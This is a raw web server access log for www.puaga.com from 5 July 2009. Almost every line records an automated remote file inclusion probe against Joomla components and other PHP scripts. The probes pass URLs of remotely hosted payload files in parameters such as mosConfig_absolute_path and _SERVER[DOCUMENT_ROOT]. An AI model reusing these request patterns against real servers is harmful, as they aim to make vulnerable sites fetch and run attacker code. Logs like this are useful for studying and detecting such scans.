66.11.230.36 - - [05/Jul/2009:08:00:24 -0700] "GET /logs/access_090525.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.32.106.32 - - [05/Jul/2009:08:00:40 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.irishia.net/zerocount/vak.sin? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.32.106.32 - - [05/Jul/2009:08:00:40 -0700] "GET /logs/access_090619.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.irishia.net/zerocount/vak.sin? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.32.106.32 - - [05/Jul/2009:08:00:40 -0700] "GET /logs/access_090510.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.irishia.net/zerocount/vak.sin? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.32.106.32 - - [05/Jul/2009:08:00:40 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.irishia.net/zerocount/vak.sin? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:08:00:55 -0700] "GET /logs/access.log////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:08:00:55 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:08:01:04 -0700] "GET /logs/access_090529.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:08:01:14 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 200 4806 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:08:01:42 -0700] "GET /logs/access_090517.log%20%20//include/mail.inc.php?skin_board_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:08:01:57 -0700] "GET /logs/access_090517.log%20%20//include/mail.inc.php?skin_board_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.194.87.219 - - [05/Jul/2009:08:02:02 -0700] "GET /logs//index.php?sayfa=http://www.animeforum.com/impex/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
82.194.87.219 - - [05/Jul/2009:08:02:13 -0700] "GET /logs//main.php?sayfa=http://www.animeforum.com/impex/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:08:02:50 -0700] "GET /logs/access.log%20%20//include/mail.inc.php?skin_board_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:08:02:52 -0700] "GET /logs/access_090618.log////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:08:02:53 -0700] "GET /logs/access.log%20%20//include/mail.inc.php?skin_board_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.223.3.98 - - [05/Jul/2009:08:03:04 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.223.3.98 - - [05/Jul/2009:08:03:04 -0700] "GET /logs/access_090525.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.223.3.98 - - [05/Jul/2009:08:03:04 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.109.250.63 - - [05/Jul/2009:08:03:18 -0700] "GET /logs/access_090603.log%20%20//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.109.250.63 - - [05/Jul/2009:08:03:24 -0700] "GET /logs/access_090603.log%20%20//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.109.250.63 - - [05/Jul/2009:08:03:37 -0700] "GET /logs/access_090603.log%20%20//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.109.250.63 - - [05/Jul/2009:08:03:44 -0700] "GET /logs/access_090605.log%20%20//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.109.250.63 - - [05/Jul/2009:08:03:55 -0700] "GET /logs/access_090605.log%20%20//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.109.250.63 - - [05/Jul/2009:08:03:59 -0700] "GET /logs/access_090605.log%20%20//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.119.154.129 - - [05/Jul/2009:08:04:44 -0700] "GET /logs/access.log/index.php?binn_include_path=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.119.154.129 - - [05/Jul/2009:08:04:44 -0700] "GET /logs/access_090518.log/index.php?binn_include_path=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:08:04:51 -0700] "GET /logs/access_090515.log%20%20//prog/pl_menu/show_menu.php?binn_include_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.119.154.129 - - [05/Jul/2009:08:05:03 -0700] "GET /logs/access_090615.log/index.php?binn_include_path=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:08:05:09 -0700] "GET /logs/access_090615.log%20%20//prog/pl_menu/show_menu.php?binn_include_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.232.54.48 - - [05/Jul/2009:08:05:19 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
201.232.54.48 - - [05/Jul/2009:08:05:19 -0700] "GET /logs/access_090531.log%20/includes/ktedit/toolbar.php?dirDepth=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
201.232.54.48 - - [05/Jul/2009:08:05:19 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
87.230.9.68 - - [05/Jul/2009:08:05:23 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
87.230.9.68 - - [05/Jul/2009:08:05:23 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
87.230.9.68 - - [05/Jul/2009:08:05:23 -0700] "GET /logs/access_090628.log//include/print_category.php?setup[use_category]=1&dir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
201.232.54.48 - - [05/Jul/2009:08:05:24 -0700] "GET /logs/access_090531.log%20/includes/ktedit/toolbar.php?dirDepth=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
201.232.54.48 - - [05/Jul/2009:08:05:27 -0700] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
201.232.54.48 - - [05/Jul/2009:08:05:27 -0700] "GET /includes/ktedit/toolbar.php?dirDepth=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
87.230.9.68 - - [05/Jul/2009:08:06:07 -0700] "GET /logs/access_090610.log//include/print_category.php?setup[use_category]=1&dir=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
201.232.54.48 - - [05/Jul/2009:08:06:39 -0700] "GET /logs/access_090530.log/includes/ktedit/toolbar.php?dirDepth=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
89.223.3.98 - - [05/Jul/2009:08:06:40 -0700] "GET /logs/access_090525.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.232.54.48 - - [05/Jul/2009:08:06:42 -0700] "GET /logs/access_090620.log/includes/ktedit/toolbar.php?dirDepth=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
82.194.87.219 - - [05/Jul/2009:08:06:44 -0700] "GET /logs///components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.animeforum.com/impex/id? HTTP/1.0" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
89.223.3.98 - - [05/Jul/2009:08:06:50 -0700] "GET /logs/access_090619.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacture_id=<emid=&mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.232.54.48 - - [05/Jul/2009:08:07:16 -0700] "GET /logs/access_090620.log/includes/ktedit/toolbar.php?dirDepth=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
201.232.54.48 - - [05/Jul/2009:08:07:16 -0700] "GET /logs/access_090530.log/includes/ktedit/toolbar.php?dirDepth=http://aciel.biz.ly/dataquw/CHID.txt%0D?? HTTP/1.0" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:08:08:22 -0700] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:08:08:34 -0700] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:08:08:48 -0700] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:08:09:01 -0700] "GET /logs/access.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:08:09:11 -0700] "GET /logs/access_090618.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:08:09:11 -0700] "GET /logs/access_090618.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:08:09:39 -0700] "GET /logs/access_090618.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://game24x7.com/_a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.37.60 - - [05/Jul/2009:08:09:57 -0700] "GET /logs/access_090618.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://extranet.teligentems.com/uiu.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:08:10:07 -0700] "GET /logs/access_090515.log%20%20//prog/pl_menu/show_menu.php?binn_include_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.11.230.36 - - [05/Jul/2009:08:10:13 -0700] "GET /logs/access_090612.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:08:10:18 -0700] "GET /logs/access_090615.log%20%20//prog/pl_menu/show_menu.php?binn_include_path=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.223.3.98 - - [05/Jul/2009:08:10:27 -0700] "GET /logs/access_090529.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.samsunpanel.com/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.146.59.116 - - [05/Jul/2009:08:13:57 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
82.146.58.249 - - [05/Jul/2009:08:13:58 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
66.232.143.238 - - [05/Jul/2009:08:14:13 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
82.146.58.249 - - [05/Jul/2009:08:14:27 -0700] "GET /?sIncPath=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 200 6125 "-" "libwww-perl/5.826" "www.puaga.com"
66.232.143.238 - - [05/Jul/2009:08:14:51 -0700] "GET /?sIncPath=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 200 6125 "-" "libwww-perl/5.805" "www.puaga.com"
118.101.1.179 - - [05/Jul/2009:08:15:46 -0700] "GET /include/write.php?dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.101.1.179 - - [05/Jul/2009:08:15:46 -0700] "GET /logs/access_090510.log//include/write.php?dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.101.1.179 - - [05/Jul/2009:08:15:51 -0700] "GET /logs//include/write.php?dir=http://www.dwno.or.kr/bbs/outlogin_skin/default/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.194.87.219 - - [05/Jul/2009:08:17:08 -0700] "GET /logs///common/db.php?commonpath=http://www.animeforum.com/impex/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
61.109.250.63 - - [05/Jul/2009:08:19:56 -0700] "GET /logs/access_090628.log//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.109.250.63 - - [05/Jul/2009:08:19:57 -0700] "GET /logs/access_090628.log//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.109.250.63 - - [05/Jul/2009:08:22:16 -0700] "GET /logs/access_090628.log//components/com_dbquery/classes/DBQ/common.class.php?mosConfig_absolute_path=http://www.daftarwarisan.gov.my/img/satu.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.40.150.211 - - [05/Jul/2009:08:22:56 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.40.150.211 - - [05/Jul/2009:08:22:56 -0700] "GET /logs/access_090624.log%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.40.150.211 - - [05/Jul/2009:08:22:56 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:08:23:01 -0700] "GET /logs/access_090611.log/?sourcedir=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.40.150.211 - - [05/Jul/2009:08:23:03 -0700] "GET /logs/access_090619.log%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.40.150.211 - - [05/Jul/2009:08:23:33 -0700] "GET /logs//components/com_moofaq/includes/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.40.150.211 - - [05/Jul/2009:08:23:33 -0700] "GET /components/com_moofaq/includes/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.40.150.211 - - [05/Jul/2009:08:23:33 -0700] "GET /logs/access_090624.log//components/com_moofaq/includes/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.40.150.211 - - [05/Jul/2009:08:23:40 -0700] "GET /logs/access_090619.log//components/com_moofaq/includes/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.40.150.211 - - [05/Jul/2009:08:24:49 -0700] "GET /logs/access_090624.log%20%20//components/com_moofaq/includes/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.40.150.211 - - [05/Jul/2009:08:24:52 -0700] "GET /logs/access_090619.log%20%20//components/com_moofaq/includes/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.40.150.211 - - [05/Jul/2009:08:24:57 -0700] "GET /logs/access_090624.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.40.150.211 - - [05/Jul/2009:08:25:03 -0700] "GET /logs/access_090619.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.194.87.219 - - [05/Jul/2009:08:26:16 -0700] "GET /logs///ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.animeforum.com/impex/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
66.71.241.146 - - [05/Jul/2009:08:26:32 -0700] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.71.241.146 - - [05/Jul/2009:08:26:32 -0700] "GET /logs/access_090624.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.71.241.146 - - [05/Jul/2009:08:26:32 -0700] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.40.150.211 - - [05/Jul/2009:08:26:41 -0700] "GET /logs/access_090618.log//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.146.59.116 - - [05/Jul/2009:08:26:44 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
85.214.147.206 - - [05/Jul/2009:08:27:03 -0700] "GET /logs/access_090605.log//?DOCUMENT_ROOT=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.214.147.206 - - [05/Jul/2009:08:27:03 -0700] "GET /logs//?DOCUMENT_ROOT=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
85.214.147.206 - - [05/Jul/2009:08:27:03 -0700] "GET /?DOCUMENT_ROOT=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
82.146.58.249 - - [05/Jul/2009:08:27:05 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
66.71.241.146 - - [05/Jul/2009:08:27:31 -0700] "GET /logs//components/com_moofaq/includes/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.71.241.146 - - [05/Jul/2009:08:27:32 -0700] "GET /logs/access_090624.log%20%20//components/com_moofaq/includes/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.71.241.146 - - [05/Jul/2009:08:27:32 -0700] "GET /components/com_moofaq/includes/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.71.241.146 - - [05/Jul/2009:08:27:40 -0700] "GET /logs/access_090619.log%20%20//components/com_moofaq/includes/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.30.87.93 - - [05/Jul/2009:08:28:09 -0700] "GET /ideal/?M=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
66.71.241.146 - - [05/Jul/2009:08:28:15 -0700] "GET /logs/access_090619.log%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.71.241.146 - - [05/Jul/2009:08:28:15 -0700] "GET /logs/access_090624.log%20%20//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.40.150.211 - - [05/Jul/2009:08:28:19 -0700] "GET /administrator/components/com_moofaq/css/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.40.150.211 - - [05/Jul/2009:08:28:19 -0700] "GET /logs/access_090624.log%20%20//administrator/components/com_moofaq/css/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.40.150.211 - - [05/Jul/2009:08:28:20 -0700] "GET /logs//administrator/components/com_moofaq/css/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.40.150.211 - - [05/Jul/2009:08:28:26 -0700] "GET /logs/access_090619.log%20%20//administrator/components/com_moofaq/css/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.163.109.234 - - [05/Jul/2009:08:28:33 -0700] "GET /logs/access.log%20%20/index.php?binn_include_path=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.163.109.234 - - [05/Jul/2009:08:28:33 -0700] "GET /logs/access_090518.log%20%20/index.php?binn_include_path=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.163.109.234 - - [05/Jul/2009:08:28:33 -0700] "GET /logs/index.php?binn_include_path=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
63.163.109.234 - - [05/Jul/2009:08:28:34 -0700] "GET /index.php?binn_include_path=http://wing5.rtaf.mi.th/home/templates/visualpixel/help/id.txt?? HTTP/1.1" 200 6125 "-" "Mozilla/5.0" "www.puaga.com"
85.214.147.206 - - [05/Jul/2009:08:28:52 -0700] "GET /logs/access_090605.log%20%20//?DOCUMENT_ROOT=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.194.87.219 - - [05/Jul/2009:08:28:52 -0700] "GET /logs///skin/zero_vote/error.php?dir=http://www.animeforum.com/impex/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
82.194.87.219 - - [05/Jul/2009:08:29:06 -0700] "GET /logs///skin/zero_vote/error.php?dir=http://www.animeforum.com/impex/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
85.214.147.206 - - [05/Jul/2009:08:29:29 -0700] "GET /logs/access_090529.log%20%20//?DOCUMENT_ROOT=http://computercabling.ca/ta//lib/ram/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.71.241.146 - - [05/Jul/2009:08:30:09 -0700] "GET /logs/access_090624.log//components/com_moofaq/includes/errors.php?error=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
